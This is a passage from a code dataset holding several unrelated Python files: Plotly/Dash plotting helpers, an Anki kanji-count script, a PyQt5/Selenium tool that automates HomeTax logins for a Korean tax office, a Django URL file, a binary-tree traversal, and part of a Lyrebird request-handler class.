data_packet in data:\n scatter = go.Scattergl(x=data_packet[0], y=data_packet[1])\n traces.append(scatter)\n if len(data_packet) > 2:\n scatter.update(data_packet[2])\n\n return go.Figure(data=traces, layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createBarGraph(title: str, data: [[[float], [float], dict]], layout_kwargs: dict = {}):\n \"\"\"Creates a Bar Graph Figure. This function supports multiple traces supplied to the 'data' parameter\n Data should be supplied in the following format:\n [[xdata_1,ydata_1, fig_layout_1], [xdata_2, ydata_2, fig_layout_2], ..., [xdata_n,ydata_n, fig_layout_n]]\n\n The 'fig_layout' property is optional. If it is supplied, the trace in question will be updated to include all of\n the properties specified..\n \"\"\"\n traces = []\n for data_packet in data:\n bar = go.Bar(x=data_packet[0], y=data_packet[1])\n traces.append(bar)\n if len(data_packet) > 2:\n bar.update(data_packet[2])\n\n return go.Figure(data=traces, layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createHeatMap(title: str, data: [[float]], heatmap_kwargs: dict = {}, layout_kwargs: dict = {}):\n\n \"\"\"Creates a HeatMap Figure object using Plotly graph objects. The data object determines the dimensions of the\n heatmap. The len(data) will be the height. The len(data[i]) will be the width of the heatmap. The Heatmap is\n constructed in a bottom-up and left-to-right manner.\n\n Discrete X and Y categories can be specified, this is done by supplying xData and yData with the X and Y category\n name respectively. The len(xData) must be equal to the width of your Heatmap, while len(yData) must be equal to the\n height of your Heatmap.\n\n A custom color scale can be supplied, ensure that it follows the correct format and that the threshold values are\n normalized and that the color scales are in rgb like so 'rgb(r_val, g_val, b_val)'\"\"\"\n\n return go.Figure(data=go.Heatmap(\n z=data,\n **heatmap_kwargs\n ), layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createHeatMapGL(title: str, data: [[float]], heatmap_kwargs: dict = {}, layout_kwargs: dict = {}):\n\n \"\"\"Creates a HeatMap Figure object using Plotly graph objects that will be rendered by WebGL.\n The data object determines the dimensions of the heatmap. The len(data) will be the height.\n The len(data[i]) will be the width of the heatmap.\n The Heatmap is constructed in a bottom-up and left-to-right manner.\n\n Discrete X and Y categories can be specified, this is done by supplying xData and yData with the X and Y category\n name respectively. The len(xData) must be equal to the width of your Heatmap, while len(yData) must be equal to the\n height of your Heatmap.\n\n A custom color scale can be supplied, ensure that it follows the correct format and that the threshold values are\n normalized and that the color scales are in rgb like so 'rgb(r_val, g_val, b_val)'\"\"\"\n\n return go.Figure(data=go.Heatmapgl(\n z=data,\n **heatmap_kwargs\n ), layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createContourMap(title: str, data: [[float]], contour_kwargs: dict = {}, layout_kwargs: dict = {}):\n\n \"\"\"Creates a Contour Figure object using Plotly graph objects. The data object determines the dimensions of the\n Contour plot. The len(data) will be the height. The len(data[i]) will be the width of the contour plot.\n The contour plot is constructed in a bottom-up and left-to-right manner.\n\n The contour plot can be customized using the contour_kwargs dict. The dict will be supplied to the contour plot\n graph object when it is created. See the plotly api for a list of customizable properties. This can be similarly be\n applied to layout_kwargs which can change the layout of contour plot.\"\"\"\n\n return go.Figure(data=go.Contour(\n z=data,\n **contour_kwargs\n ), layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createTable(title: str, headers: [str], cells: [[]], header_kwargs: dict = {}, cell_kwargs: dict = {},\n layout_kwargs: dict = {}):\n \"\"\"Creates a Table figure using Plotly graph objects. Table headers and cells need to be supplied separately.\n The data format for the headers and cells are as follows:\n Headers: [hdr1, hdr2,...,hdrN]\n Cells: [column1_data, column2_data,..., columnN_data].\n\n The Table headers and cells are customized separately using the header_kwargs and cell_kwargs parameters. The\n layout of the Table can also be customized using the layout_kwargs.\"\"\"\n\n return go.Figure(data=go.Table(\n header=dict(values=headers, **header_kwargs),\n cells=dict(values=cells, **cell_kwargs)\n ), layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createPieChart(title: str, labels: [str], values: [float], pie_kwargs: dict = {}, layout_kwargs: dict = {}):\n \"\"\" Creates a Pie Chart Figure using Plotly graph objects. Chart labels and values need to be supplied separately.\n The data format for the labels and values are as follows:\n Labels: [lbl1, lbl2,..., lblN]\n Values: [val1, val2,..., valN]\n\n The Pie chart can be customized using the pie_kwargs parameter. The layout of the Pie chart can be customized using\n the layout_kwargs parameter.\"\"\"\n\n return go.Figure(data=go.Pie(labels=labels, values=values, **pie_kwargs),\n layout=go.Layout(title=title, **layout_kwargs))\n\n\ndef createGraph(graphID: str, figure: go.Figure, classname: str = 'bg-white'):\n return html.Div(\n className=classname,\n children=[\n dcc.Graph(id=graphID, figure=figure)\n ],\n style={'height': figure.layout.height}\n )\n\n\ndef createLiveGraph(graphID: str, figure: go.Figure, vs: VisualInterface, callback, classname: str = 'bg-white'):\n graph = createGraph(graphID, figure, classname)\n\n def update_live_graph_callback(n_intervals, n_clicks, figure):\n context = dash.callback_context.triggered[0]['prop_id'].split('.')[0]\n if (context == 'step-button' and not vs.running) or vs.running:\n return callback(figure)\n else:\n return figure\n\n # Add Callback\n vs.app.callback(\n dash.dependencies.Output(graphID, 'figure'),\n [dash.dependencies.Input('interval-component', 'n_intervals'),\n dash.dependencies.Input('step-button', 'n_clicks'),\n dash.dependencies.Input(graphID, 'figure')]\n )(update_live_graph_callback)\n\n return graph\n\n\ndef createLabel(label_id, content):\n return html.Div(className=\"padding-top-bot\", children=[html.H6(content, id=label_id)])\n\n\ndef createLiveLabel(label_id, initial_content, vs: VisualInterface, callback):\n label = createLabel(label_id, initial_content)\n\n def update_live_label_callback(n_intervals, n_clicks, children):\n context = dash.callback_context.triggered[0]['prop_id'].split('.')[0]\n if (context == 'step-button' and not vs.running) or vs.running:\n return callback(children)\n else:\n return children\n\n # Add Callback\n vs.app.callback(\n dash.dependencies.Output(label_id, 'children'),\n [dash.dependencies.Input('interval-component', 'n_intervals'),\n dash.dependencies.Input('step-button', 'n_clicks'),\n dash.dependencies.Input(label_id, 'children')]\n )(update_live_label_callback)\n\n return label\n\n\ndef createSlider(slider_id: str, slider_name: str, vs: VisualInterface, set_val, min_val: float = 0.0,\n max_val: float = 1.0, step: float = 0.01):\n \"\"\"This function will add a slider to the parameter window of the visual interface. It will also automatically add\n a callback function that will supply your custom function 'set_val' with the value of the slider\"\"\"\n\n # Add html\n slider = html.Div(\n className=\"padding-top-bot\",\n children=[\n html.H6('{}: [{}]'.format(slider_name, max_val), id=slider_id + '-title'),\n dcc.Slider(\n id=slider_id,\n min=min_val,\n max=max_val,\n value=max_val,\n step=step\n )\n ]\n )\n\n # Add callback\n\n def set_slider_val(value):\n set_val(value)\n return '{}: [{}]'.format(slider_name, value)\n\n vs.app.callback(dash.dependencies.Output(slider_id + '-title', 'children'),\n [dash.dependencies.Input(slider_id, 'value')])(set_slider_val)\n\n return slider\n\n\ndef addRect(fig: go.Figure, x, y, width=1, height=1, **shape_kwargs):\n \"\"\"Adds a rectangle to Figure 'fig'. x & y refer to the coordinates of the bottom left corner of the rectangle.\"\"\"\n x1 = x + width\n y1 = y + height\n fig.add_shape(\n x0=x,\n y0=y,\n x1=x1,\n y1=y1,\n type='rect',\n **shape_kwargs\n )\n\n\ndef addCircle(fig: go.Figure, x, y, radius=0.5, **shape_kwargs):\n \"\"\"Adds a circle to Figure 'fig'. x & y are the coordinates of the center of the circle\"\"\"\n x0 = x - radius\n x1 = x + radius\n y0 = y - radius\n y1 = y + radius\n\n fig.add_shape(\n x0=x0,\n x1=x1,\n y0=y0,\n y1=y1,\n type='circle',\n **shape_kwargs\n )\n\n\ndef createTabs(labels: [str], tabs: []):\n return html.Div([\n dcc.Tabs(\n [\n dcc.Tab(label=labels[x], children=tabs[x]) for x in range(len(labels))\n ]\n )])\n","sub_path":"ECAgent/Visualization.py","file_name":"Visualization.py","file_ext":"py","file_size_in_byte":17287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"621211518","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport json\nimport sqlite3\nimport sys\nimport unicodedata\n\ndef select_deck():\n decks = []\n for row in c.execute('SELECT decks FROM col'):\n deks = json.loads(row[0])\n for key in deks:\n d_id = deks[key]['id']\n d_name = deks[key]['name']\n decks.append((d_id, d_name))\n\n print('Which deck would you like to plot?\\n')\n\n for i in range(len(decks)):\n print(' ['+str(i)+'] '+decks[i][1])\n inp = int(input('\\n'))\n return decks[inp]\n\nconn = sqlite3.connect('collection.anki2')\nc = conn.cursor()\nwith_raw = False\nraw_rel = False\n\nif(sys.platform == 'win32'):\n kanjiplot_command = 'kanjiplot '\n write_flags = 'wb'\nelse:\n kanjiplot_command = './kanjiplot.sh '\n write_flags = 'w'\n\nif(len(sys.argv) < 2 or sys.argv[1] == 'with_raw_abs' or sys.argv[1] == 'with_raw_rel'):\n if len(sys.argv) == 2:\n if(sys.argv[1] == 'with_raw_abs'):\n with_raw = True\n if(sys.argv[1] == 'with_raw_rel'):\n with_raw = True\n raw_rel = True\n deck_tpl = select_deck()\n deck_id = deck_tpl[0]\nelse:\n if(sys.argv[1] == 'find'):\n deck_tpl = select_deck()\n print('\\ndeck \"'+deck_tpl[1]+'\" has ID '+str(deck_tpl[0])+'\\n\\nrun the following command for automated plotting:\\n'+kanjiplot_command+str(deck_tpl[0])+'\\n\\n\\n')\n sys.exit(0)\n deck_id = sys.argv[1]\n\ndates = []\nkanji = []\ndata_points = dict()\ntotal = 0\n\ncards_data_points = dict()\ncards_total = 0\n\nkanji_data_points = dict()\n\nfor row in c.execute('SELECT id, flds FROM notes WHERE id IN (SELECT nid FROM cards WHERE did IS ' + str(deck_id) + ') ORDER BY id'):\n timestamp = row[0]\n date = datetime.datetime.fromtimestamp(timestamp/1000).strftime(\"%y%m%d\")\n data = row[1]\n cards_total += 1\n cards_data_points[date] = cards_total\n for i in range(0, len(data)):\n char = data[i]\n try:\n if(unicodedata.name(char).find('CJK UNIFIED IDEOGRAPH') >= 0):\n if(not char in kanji):\n total += 1\n kanji.append(char)\n if(not date in dates):\n dates.append(date)\n data_points[date] = total\n if with_raw:\n if not date in kanji_data_points:\n kanji_data_points[date] = ''\n if not raw_rel:\n kanji_data_points[date] = ''\n if raw_rel:\n if(kanji_data_points[date].find(char) == -1):\n kanji_data_points[date] += char\n else:\n for i in range(0, len(kanji)):\n kanji_data_points[date] += kanji[i]\n except ValueError:\n pass\n\nf = open('kanji.dat', write_flags)\nif with_raw:\n fr = open('kanji_raw.dat', write_flags)\nfor d in dates:\n if with_raw:\n if(sys.platform == 'win32'):\n fr.write(str(d) + ' ' + kanji_data_points[d].encode('utf8') + '\\n')\n else:\n fr.write(str(d) + ' ' + str(kanji_data_points[d]) + '\\n')\n f.write(str(d) + ' ' + str(data_points[d]) + ' ' + str(cards_data_points[d]) + '\\n')\n","sub_path":"kanjiplot.py","file_name":"kanjiplot.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"67029735","text":"import time\nimport os\nimport sys\nimport zipfile\nimport json\nimport PyQt5\n# from PyQt5.Qt import QApplication\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QDesktopWidget, QWidget, QPushButton, QRadioButton, QLabel, QLineEdit, QAction, qApp \nfrom PyQt5.QtWidgets import QMessageBox, QTabWidget, QGridLayout, QGroupBox, QHBoxLayout, QVBoxLayout, QFormLayout\nfrom PyQt5.QtGui import QIcon, QRegExpValidator, QDoubleValidator, QIntValidator\nfrom PyQt5.QtCore import pyqtSlot, Qt, QRegExp\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport data\nimport Util\nfrom Util import *\n\n'''배포판 실행파일(exe) 만들기 https://wikidocs.net/21952 https://winterj.me/pyinstaller/\npyinstaller 디코딩에러 수정 https://stackoverflow.com/questions/47692960/error-when-using-pyinstaller-unicodedecodeerror-utf-8-codec-cant-decode-byt\nI found an answer on another forum. I change the line number 427 in the Python\\Lib\\site-packages\\Pyinstaller\\compat.py file\n'''\n# 처음시작시 경로설정\nbase_path = \"C:\\\\\"\nmain_dir = \"ATM\"\nmain_path = os.path.join(base_path, main_dir) # APP 저장경로\nst1_app_dir = ['loginAPP', 'data']\nst1_app_path = os.path.join(main_path, st1_app_dir[0]) # 첫번째앱 저장경로\ndriver_path = os.path.join(st1_app_path, \"driver\") # 크롬드라이버 저장경로\ndata_path = os.path.join(st1_app_path, \"data\") # json 파일 등 저장경로\njson_fn = \"data.json\" # \nfull_json_fn = os.path.join(data_path, json_fn) # json 파일 full 경로\n\ndef set_path_make_json():\n \"\"\" 앱 경로설정\n \"\"\"\n try:\n if not os.path.isdir(main_path):\n Util.make_sub_dirs(base_path, main_dir)\n except:\n pass\n\n # 앱 경로에 하위 경로 설정하고 json 파일 생성후 생성된 json 파일에서 변수로 활용할 파이썬 객체 (nts_dict) 생성\n try:\n if not os.path.isdir(st1_app_path):\n # 1. 하위 APP 디렉토리 없으면 만들고\n Util.make_sub_dirs(main_path, *st1_app_dir)\n Util.make_sub_dirs(st1_app_path, \"driver\") \n\n # 1.1 크롬드라이버 설치(exe 파일과 zip 파일을 같은 경로에...)\n try:\n with zipfile.ZipFile(os.path.join(os.getcwd(), \"chromedriver.zip\")) as zf:\n zf.extractall(driver_path)\n except:\n pass\n\n # 2. 딕셔너리를 json 파일로 만들어 저장\n nts_dict = data.get_nts_dict()\n nts_dict['secret']['크롬경로'] = driver_path \n with open(full_json_fn, 'w', encoding='utf-8') as fn:\n json.dump(nts_dict, fn, ensure_ascii=False, indent=4)\n # json_data = json.dumps(_dict_data, ensure_ascii=False, indent=4)\n\n # 3. 저장된 json 파일을 파이썬 객체(딕셔너리)로...\n with open(full_json_fn, encoding='utf-8') as fn:\n nts_dict = json.load(fn)\n\n elif os.path.isdir(st1_app_path):\n if not os.path.isfile(full_json_fn):\n # 2. 딕셔너리를 json 파일로 만들어 저장\n nts_dict = data.get_nts_dict() \n with open(full_json_fn, 'w', encoding='utf-8') as fn:\n json.dump(nts_dict, fn, ensure_ascii=False, indent=4)\n # json_data = json.dumps(_dict_data, ensure_ascii=False, indent=4)\n\n # 3. 저장된 json 파일을 파이썬 객체(딕셔너리)로...\n with open(full_json_fn, encoding='utf-8') as fn:\n nts_dict = json.load(fn) \n\n elif os.path.isfile(full_json_fn):\n # 3. 저장된 json 파일을 파이썬 객체(딕셔너리)로...\n with open(full_json_fn, encoding='utf-8') as fn:\n nts_dict = json.load(fn) \n except:\n pass\n finally:\n return nts_dict\n\nnts_dict = set_path_make_json() \n\n# 브라우저 높이에 따른 크롬 실행환경 변경 flag\nflag_window_height = True\n\n# 셀레니움 Xpath element 반환함수\ndef get_element(driver, id):\n try:\n if \"세무법인이노택스테헤\" not in id:\n wait = WebDriverWait(driver, 10)\n element = wait.until(EC.presence_of_element_located((By.XPATH, f\"//*[@id=\\'{id}\\']\")))\n elif \"세무법인이노택스테헤\" in id:\n wait = WebDriverWait(driver, 10)\n element = wait.until(EC.presence_of_element_located((By.XPATH, f\"//*[@title=\\'{id}\\']\")))\n return element\n\n except Exception as e:\n err_class_name = e.__class__.__name__\n msg = f\"selenium id < {id} >에서 예외 < {err_class_name} >가 발생 하였습니다.\"\n errmsg = Errpop().critical_pop(msg)\n\n\nclass Ui_nts_ligin(QWidget):\n def __init__(self, parent=None):\n super().__init__()\n # super(QWidget,self).__init__(parent)\n self.bs_id = nts_dict['secret']['부서아이디'] \n self.delay_time = float(nts_dict['secret']['딜레이타임']) \n \n self.initUI()\n\n def initUI(self):\n\n grid = QGridLayout()\n grid.addWidget(self.firstGroup(), 0, 0)\n grid.addWidget(self.secondGroup(), 0, 1)\n\n self.setLayout(grid)\n \n def firstGroup(self):\n groupbox = QGroupBox('CTA ID 로그인')\n self.radio1 = QRadioButton('W15960')\n self.radio2 = QRadioButton('P27687')\n self.radio1.setChecked(True)\n\n # QRadioButton 예제 https://wikidocs.net/5237\n self.radio1.clicked.connect(self.radioButtonClicked)\n self.radio2.clicked.connect(self.radioButtonClicked)\n\n btn1 = QPushButton('홈택스 로그인')\n btn1.setToolTip('HomeTax Login')\n btn1.clicked.connect(self.btn1_click)\n\n vbox = QVBoxLayout()\n vbox.addWidget(self.radio1)\n vbox.addWidget(self.radio2)\n vbox.addWidget(btn1)\n groupbox.setLayout(vbox)\n\n return groupbox\n\n def secondGroup(self):\n # QLineEdit 총괄 : https://www.tutorialspoint.com/pyqt/pyqt_qlineedit_widget\n groupbox = QGroupBox('부서 ID 및 딜레이 변경 ')\n\n le1 = QLineEdit()\n le2 = QLineEdit()\n le1.setPlaceholderText(nts_dict['secret']['부서아이디'])\n le2.setPlaceholderText(str(nts_dict['secret']['딜레이타임']))\n \n # 입력제한 http://bitly.kr/wmonM2\n reg_ex = QRegExp(\"[0-9]+.?[0-9]{,2}\")\n input_validator = QRegExpValidator(reg_ex, le2)\n # double_validator = QDoubleValidator(-999.0, 999.0, 2) ### http://bitly.kr/wmonM2\n le2.setValidator(input_validator) # double_validator) \n le2.setMaxLength(3) \n\n le1.textChanged[str].connect(self.le1Changed)\n le2.textChanged[str].connect(self.le2Changed)\n\n btn2 = QPushButton('변경사항저장', self)\n btn2.setToolTip('저장하기')\n btn2.clicked.connect(self.btn2_click)\n\n flo = QFormLayout()\n flo.addRow(\"부서아이디\", le1)\n flo.addRow(\"딜레이타임\", le2)\n flo.addRow(btn2)\n groupbox.setLayout(flo)\n\n return groupbox\n\n def radioButtonClicked(self):\n \n if self.radio1.isChecked():\n if self.radio1.text() != nts_dict['secret']['세무사관리번호']:\n nts_dict['secret']['세무사관리번호'] = self.radio1.text()\n \n elif self.radio2.isChecked():\n if self.radio2.text() != nts_dict['secret']['세무사관리번호']:\n nts_dict['secret']['세무사관리번호'] = self.radio2.text()\n else:\n pass\n # 2. 수정된 딕셔너리를 json 파일로 만들어 저장 \n with open(full_json_fn, 'w', encoding='utf-8') as fn:\n json.dump(nts_dict, fn, ensure_ascii=False, indent=4)\n \n def btn1_click(self):\n if self.radio1.isChecked():\n if self.radio1.text() != nts_dict['secret']['세무사관리번호']:\n nts_dict['secret']['세무사관리번호'] = self.radio1.text()\n \n elif self.radio2.isChecked():\n if self.radio2.text() != nts_dict['secret']['세무사관리번호']:\n nts_dict['secret']['세무사관리번호'] = self.radio2.text()\n else:\n pass\n # 2. 수정된 딕셔너리를 json 파일로 만들어 저장 \n with open(full_json_fn, 'w', encoding='utf-8') as fn:\n json.dump(nts_dict, fn, ensure_ascii=False, indent=4)\n\n login = Nts_Login()\n login.path2()\n\n def le1Changed(self, text):\n self.bs_id = text\n \n def le2Changed(self, text):\n self.delay_time = text\n \n\n def btn2_click(self):\n # 2. 수정된 딕셔너리를 json 파일로 만들어 저장 \n with open(full_json_fn, 'w', encoding='utf-8') as fn:\n nts_dict['secret']['부서아이디'] = self.bs_id\n nts_dict['secret']['딜레이타임'] = str(self.delay_time)\n json.dump(nts_dict, fn, ensure_ascii=False, indent=4)\n\nclass Ui_nts_task(QWidget):\n def __init__(self, parent=None):\n super().__init__()\n # super(QWidget,self).__init__(parent)\n \n self.initUi()\n\n def initUi(self):\n\n grid = QGridLayout()\n btn1 = QPushButton()\n grid.addWidget(btn1)\n btn1.clicked.connect(self.btn1_click)\n\n self.setLayout(grid) \n\n def btn1_click(self):\n print(\"btn1 clicked\") \n\nclass Ui_web_task(QWidget):\n def __init__(self, parent=None):\n super().__init__()\n # super(QWidget,self).__init__(parent) \n label = QLabel('개발중...') \n layout = QVBoxLayout()\n layout.addWidget(label) \n\n self.setLayout(layout) \n\nclass Main(QMainWindow): # (QWidget): #\n def __init__(self):\n \"\"\" QMainWindow 에서는 QHBoxLayout, QVBoxLayout 같은 layout 사용못함.\n QWidget, QDialog 와 달리 QMainWindow 는 자체적으로 layout 가지고 있다. central widget 을 반드시 필요로함.\n https://freeprog.tistory.com/326\"\"\"\n super().__init__()\n \n # self.setWindowFlags(Qt.WindowStaysOnTopHint | Qt.WindowTitleHint) # | Qt.FramelessWindowHint) 항상 위에\n # 우하단 위젯\n rect = QDesktopWidget().availableGeometry() # 작업표시줄 제외한 화면크기 반환\n max_x = rect.width()\n max_y = rect.height()\n # 브라우저 높이에 따른 크롬 실행환경 변경 flag\n global flag_window_height\n if max_y <= 900:\n flag_window_height = False\n\n width, height = 350 , 220\n # width, height = 350 , 250\n left = max_x - width \n top = max_y - height \n\n self.setGeometry(left, top, width, height)\n\n # 탭 위젯\n tab1 = Ui_nts_ligin(self)\n tab2 = Ui_nts_task(self)\n tab3 = Ui_web_task(self)\n\n tabs = QTabWidget()\n tabs.addTab(tab1, '홈택스 로그인')\n tabs.addTab(tab2, '홈택스 작업')\n tabs.addTab(tab3, '웹 작업')\n\n self.setCentralWidget(tabs) \n self.setWindowTitle('ATM(자동화)')\n self.setWindowFlags(Qt.FramelessWindowHint) # windowtitle 제외\n #>>> 메뉴바 https://wikidocs.net/21866\n exitAction = QAction(QIcon('exit.png'), '종료', self)\n exitAction.setShortcut('Ctrl+Q')\n exitAction.setStatusTip('Exit application')\n exitAction.triggered.connect(qApp.quit)\n\n # self.statusBar()\n\n menubar = self.menuBar()\n menubar.setNativeMenuBar(False)\n fileMenu = menubar.addMenu('&메뉴')\n fileMenu.addAction(exitAction)\n #<<< 메뉴바\n self.statusBar().showMessage('Ready')\n\n self.show()\n\n# class Errpop(QWidget):\n# def __init__(self):\n# super().__init__() \n# rect = QDesktopWidget().availableGeometry() # 작업표시줄 제외한 화면크기 반환\n# max_x = rect.width()\n# max_y = rect.height()\n\n# width, height = 350 , 250\n# left = max_x - width \n# top = max_y - height\n# self.setGeometry(left, top, width, height) \n\n# def critical_pop(self, msg): \n# msg = msg\n# QMessageBox.critical(self, '에러 메세지', msg, QMessageBox.Ok)\n\n# class Get_driver:\n# def __init__(self, driver_path, driver_name):\n# self.driver_path = driver_path\n# self.driver_name = driver_name\n# self.full_driver_name = os.path.join(self.driver_path, self.driver_name)\n\n# def set_driver(self):\n \n# if \"chrome\" in self.full_driver_name:\n# try:\n# chrome_options = webdriver.ChromeOptions()\n\n# driver = webdriver.Chrome(self.full_driver_name, options=chrome_options)\n# return driver\n# except:\n# msg = \"드라이버 경로( {0} )에 {1}이(가) 없습니다 !!!\".format(self.driver_path, self.driver_name)\n# errmsg = Errpop().critical_pop(msg)\n \n# elif True :\n# pass \n\nclass Nts_Login:\n def __init__(self):\n driver_path = nts_dict['secret']['크롬경로'] \n driver_name = nts_dict['secret']['크롬드라이버'] \n chrome_driver = Get_driver(driver_path, driver_name)\n self.driver = chrome_driver.set_driver()\n self.driver.get('https://www.hometax.go.kr/')\n # 모니터 작은 경우\n global flag_window_height\n if flag_window_height == False:\n self.driver.maximize_window()\n self.delay_time = float(nts_dict['secret']['딜레이타임'])\n time.sleep(self.delay_time)\n\n # 홈택스 별도페이지\n def path2(self):\n try:\n _ST1BOX = self.driver.find_element_by_id(\"ST1BOX\") # 종합소득세 신고\n _ST1BOX.click()\n time.sleep(self.delay_time)\n self.loginnts()\n except:\n self.loginnts()\n time.sleep(self.delay_time + 1)\n\n def loginnts(self):\n \n # 홈텍스로 이동, 상단 로그인\n get_element(self.driver, nts_dict['elem_id']['login']['최상단로그인']).click()\n # self.driver.implicitly_wait(delay_time)\n\n # 메인영역\n elem = get_element(self.driver, nts_dict['메인영역'])\n self.driver.switch_to_frame(elem)\n time.sleep(self.delay_time)\n \n # 관리자인 경우 공인인증서 직접로그인\n if nts_dict['secret']['부서아이디'] == nts_dict['secret']['수퍼아이디']:\n\n get_element(self.driver, nts_dict['elem_id']['login']['인증서로그인']).click()\n time.sleep(self.delay_time)\n\n # 공인인증서 영역\n elem = get_element(self.driver, nts_dict['elem_id']['login']['공인인증서영역'])\n self.driver.switch_to_frame(elem)\n time.sleep(self.delay_time + 0.5)\n \n # 공인인증서 선택\n get_element(self.driver, nts_dict['elem_id']['login']['공인인증서명칭']).click()\n time.sleep(self.delay_time)\n\n # 인증서 비밀번호 입력\n cert_pw = nts_dict['secret']['공인인증서비번']\n get_element(self.driver, nts_dict['elem_id']['login']['공인인증서비번']).send_keys(cert_pw)\n get_element(self.driver, nts_dict['elem_id']['login']['공인인증서확인']).click()\n time.sleep(self.delay_time)\n self.driver.switch_to_alert.accept()\n\n # 메인영역\n elem = get_element(self.driver, nts_dict['메인영역'])\n self.driver.switch_to_frame(elem)\n time.sleep(self.delay_time)\n\n # 세무대리인 관리번호 비번\n cta_id = nts_dict['secret']['세무사관리번호']\n cta_pw = nts_dict['secret']['세무사비번']\n get_element(self.driver, nts_dict['elem_id']['login']['세무사관리번호']).send_keys(cta_id)\n get_element(self.driver, nts_dict['elem_id']['login']['세무사비번']).send_keys(cta_pw)\n # 로그인 버튼\n get_element(self.driver, nts_dict['elem_id']['login']['최종로그인']).click()\n\n else:\n # 부서아이디 비번 로그인\n bs_id = nts_dict['secret']['부서아이디']\n bs_pw = nts_dict['secret']['부서비번']\n get_element(self.driver, nts_dict['elem_id']['login']['부서아이디']).send_keys(bs_id)\n get_element(self.driver, nts_dict['elem_id']['login']['부서비번']).send_keys(bs_pw)\n # 부서아이디로그인 버튼\n get_element(self.driver, nts_dict['elem_id']['login']['부서아이디로그인']).click()\n time.sleep(self.delay_time + 1)\n\n # 공인인증서 영역\n elem = get_element(self.driver, nts_dict['elem_id']['login']['공인인증서영역'])\n self.driver.switch_to_frame(elem)\n time.sleep(self.delay_time + 1)\n\n # 공인인증서 선택\n get_element(self.driver, nts_dict['elem_id']['login']['공인인증서명칭']).click()\n time.sleep(self.delay_time)\n\n # 인증서 비밀번호 입력\n cert_pw = nts_dict['secret']['공인인증서비번']\n get_element(self.driver, nts_dict['elem_id']['login']['공인인증서비번']).send_keys(cert_pw)\n get_element(self.driver, nts_dict['elem_id']['login']['공인인증서확인']).click()\n time.sleep(self.delay_time + 1)\n self.driver.switch_to.alert.accept()\n\n # 메인영역\n elem = get_element(self.driver, nts_dict['메인영역'])\n self.driver.switch_to_frame(elem)\n time.sleep(self.delay_time)\n\n # 세무대리인 관리번호 비번\n cta_id = nts_dict['secret']['세무사관리번호']\n cta_pw = nts_dict['secret']['세무사비번']\n get_element(self.driver, nts_dict['elem_id']['login']['세무사관리번호']).send_keys(cta_id)\n get_element(self.driver, nts_dict['elem_id']['login']['세무사비번']).send_keys(cta_pw)\n # 로그인 버튼\n get_element(self.driver, nts_dict['elem_id']['login']['최종로그인']).click()\n\nif __name__ == \"__main__\":\n # login = Nts_Login()\n # login.path2()\n\n app = QApplication(sys.argv)\n ex = Main()\n sys.exit(app.exec_())\n\n","sub_path":"ATM_V1.py","file_name":"ATM_V1.py","file_ext":"py","file_size_in_byte":18790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"453686201","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n # Examples:\n url(r'^$', 'infoviz.views.home', name='home'),\n url(r'^disclaimer$', 'infoviz.views.disclaimer', name='disclaimer'),\n url(r'^books/', include('books.urls', namespace=\"books\")),\n url(r'^admin/', include(admin.site.urls)),\n]\n","sub_path":"infoviz/infoviz/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"92285027","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def inorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n # Early termination\n if root == None: return []\n\n self.traversal_list = []\n\n def traversal(node):\n if node.left != None:\n traversal(node.left)\n self.traversal_list.append(node.val)\n if node.right != None:\n traversal(node.right)\n\n traversal(root)\n\n return self.traversal_list\n","sub_path":"Codes/94_Binary_Tree_Inorder_Traversal/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"136544436","text":"from .. import context\nfrom lyrebird import application\nfrom urllib.parse import urlparse\nimport urllib\nimport uuid\nimport time\nimport gzip\nimport json\n\n\nclass HandlerContext:\n \"\"\"\n 请求处理器上下文变量\n 用于保存一个请求处理过程中的request, response\n\n \"\"\"\n MOCK_PATH_PREFIX = '/mock'\n\n def __init__(self, request, raw_path):\n self.id = str(uuid.uuid4())\n self.request = request\n self._raw_path = raw_path\n self._response = None\n self.client_req_time = None\n self.client_resp_time = None\n self.server_req_time = None\n self.server_resp_time = None\n self.flow = dict(id=self.id, size=0, duration=0)\n self.client_address = None\n self._parse_request()\n\n \n def _parse_request(self):\n # Read stream\n self.request.get_data()\n # parse path\n request_info = self._read_origin_request_info_from_url()\n if not request_info['host']:\n request_info = self._read_origin_request_info_from_header()\n\n headers = {k:v for k,v in self.request.headers}\n _request = dict(\n headers=headers,\n method=self.request.method,\n )\n _request.update(request_info)\n \n # handle request data\n if self.request.method in ['POST', 'PUT']:\n RequestDataHelper.req2dict(self.request, output=_request)\n \n if self.request.headers.get('Lyrebird-Client-Address'):\n self.client_address = self.request.headers.get('Lyrebird-Client-Address')\n else:\n self.client_address = self.request.remote_addr\n \n self.flow['request'] = _request\n context.application.cache.add(self.flow)\n\n def _read_origin_request_info_from_url(self):\n path_index = self.request.url.index(self._raw_path)\n url = self.request.url[path_index:]\n parsed_path = urlparse(url)\n _request = dict(\n url=url,\n scheme=parsed_path.scheme,\n host=parsed_path.hostname,\n port=parsed_path.port if parsed_path.port else '80',\n path=parsed_path.path\n 